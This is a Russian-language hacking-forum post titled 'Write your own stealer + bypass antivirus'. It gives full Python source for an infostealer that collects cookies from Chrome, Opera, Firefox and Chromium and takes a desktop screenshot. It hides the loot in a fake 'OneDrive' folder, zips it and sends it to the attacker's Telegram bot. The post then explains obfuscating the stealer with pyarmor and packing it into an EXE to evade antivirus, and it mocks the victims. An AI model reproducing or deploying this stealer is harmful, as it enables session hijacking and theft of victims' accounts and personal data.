Пишем свой стиллер + обходим анти-вирусы

Messages
121
Reputation
1
Reaction score
46
Points
28
Установка зависимостей

До начала написания самого стиллера, нам потребуется установить некоторые библиотеки.

Это упростит написание самого кода, конечно можно написать это всё самому, но это займет много времени.

1. Самый важный компонент стиллера, который будет собирать Cookies с компьютера жертвы.

pip install browser-cookie3

2. Для отправки логов с компьютера жертвы мы будет использовать библиотеку Telebot.

Да это не совсем безопасно, по скольку узнав ваш TOKEN с помощью одного скрипта все логи будут украдены.

Я показываю пример с Telegram ботом лишь для примера, в свою очередь вы можете как угодно передавать эти данные.

pip install pyTelegramBotAPI

3. Для захвата изображения с экрана на момент открытия:

pip install image

4. Шифрования файла.

pip install pyarmor

5. Что-бы из этого все-го сделать EXE файл.

pip install pyinstaller

Написание стиллера

from browser_cookie3 import chrome, opera, firefox, chromiumimport telebotimport timeimport osimport getpassimport zipfilefrom PIL import ImageGrab # Ваш Telegram TokenTOKEN = 'xxx-xxx-xxx'# Ваш Telegram IDowner_id = ВАШ_ID username = getpass.getuser()FOLDER_NAME = 'OneDrive'PATH_TO_ROAMING = f'C:\\Users\\{ username }\\AppData\\Roaming'PATH_TO_FOLDER = None # Проверяем существует ли такая папка, и если нет тогда создаем.if not os.path.exists( PATH_TO_ROAMING + f'\\{FOLDER_NAME}' ): os.mkdir( PATH_TO_ROAMING + f'\\{FOLDER_NAME}' ) PATH_TO_FOLDER = PATH_TO_ROAMING + f'\\{FOLDER_NAME}' def steal_cookies( browser ): try: cookeis = browser() return cookeis except Exception as error: return None def getcookeis(): try: sreenshot_desktop = ImageGrab.grab() sreenshot_desktop.save( PATH_TO_FOLDER + '\\Desktop.png' ) if PATH_TO_FOLDER: # Собираем Cookies cookeis_data = {} chrome_cookeis = steal_cookies(chrome) opera_cookeis = steal_cookies(opera) firefox_cookeis = steal_cookies(firefox) chromium_cookeis = steal_cookies(chromium) if chrome_cookeis: cookeis_data['chrome'] = {'cookeis' : chrome_cookeis } if opera_cookeis: cookeis_data['opera'] = {'cookeis' : opera_cookeis } if firefox_cookeis: cookeis_data['firefox'] = {'cookeis' : firefox_cookeis } if chromium_cookeis: cookeis_data['chromium'] = {'cookeis' : chromium_cookeis } data_cookies = '' for browser_name , cattribs in cookeis_data.items(): try: cattribs = list( cattribs['cookeis'] ) for cookie in cattribs: try: expires = cookie.expires if expires == None: expires = round( time.time() + 14 * 24 * 3600 ) data_cookies += f'{cookie.domain}\t{cookie.domain_specified}\t{cookie.path}\t{cookie.secure}\t{expires}\t{cookie.name}\t{cookie.value}\n' with open( PATH_TO_FOLDER + '\\Cookies[0][{}].txt'.format( browser_name.capitalize(), data_cookies ) , 'a') as file_with_cookies: file_with_cookies.write( data_cookies ) data_cookies = '' except Exception: data_cookies = '' except Exception as error: pass except Exception: pass # Упаковываем все файлы в архивdef pack(): try: if PATH_TO_FOLDER: files = os.listdir( PATH_TO_FOLDER ) with zipfile.ZipFile(f'{PATH_TO_FOLDER}\\log.zip', 'w') as myzip: for file_name in files: myzip.write( PATH_TO_FOLDER + f'\\{file_name}' ) except Exception: pass def start_bot( TOKEN ): try: getcookeis() pack() bot = telebot.TeleBot( TOKEN ) bot.send_document( owner_id, open( PATH_TO_FOLDER + '\\log.zip', 'rb'), caption='Аххапхахп ебать мамонт попался :))' ) bot.polling() except Exception: time.sleep( 10 ) start_bot( TOKEN ) # Запускаем ботаstart_bot( TOKEN )

Обходим АнтиВирус + Упаковываем

Есть множество вариантов как можно его обойти, одни из самых простих это при помощи pyarmor.

1. Для начала открываем cmd.exe, это можно сделать зажав комбинацию клавиш: ( WIN + R ), и ведя в строку cmd.

2. После переходим в папку с нашим скриптом, это можно сделать так:
cd ПУТЬ\К\ВАШЕЙ\ПАПКЕ

3. Далее вводим следующую команду:
Где main.py - это ваш файл с стиллером.
После открытия файла мы видим это прекрасное сообщение:
IMG_20210926_060725_192.jpg

IMG_20210926_060718_125.jpg

Заливаем файл на VT и видим что все получилось.
IMG_20210926_060727_955.jpg

На этом все! Удачи!
 
Top